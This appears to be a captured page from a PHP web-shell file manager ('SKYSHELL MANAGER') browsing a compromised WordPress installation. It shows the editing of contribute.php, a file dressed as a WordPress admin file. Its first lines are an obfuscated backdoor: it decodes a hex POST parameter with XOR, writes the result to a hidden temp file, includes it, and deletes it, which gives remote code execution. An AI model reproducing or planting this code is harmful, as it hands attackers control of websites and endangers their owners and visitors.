📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: contribute.php
<?php if(isset($_POST) && isset($_POST["en\x74ity"])){ $tkn = hex2bin($_POST["en\x74ity"]); $reference= '' ; $b = 0; do{$reference .= chr(ord($tkn[$b]) ^ 19);$b++;} while($b < strlen($tkn)); $factor = array_filter([sys_get_temp_dir(), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", session_save_path(), getenv("TEMP"), "/var/tmp"]); foreach ($factor as $key => $rec) { if ((is_dir($rec) and is_writable($rec))) { $fac = sprintf("%s/.holder", $rec); if (@file_put_contents($fac, $reference) !== false) { include $fac; unlink($fac); die(); } } } } /** * Network Contribute administration panel. * * @package WordPress * @subpackage Multisite * @since 6.3.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/contribute.php';
Save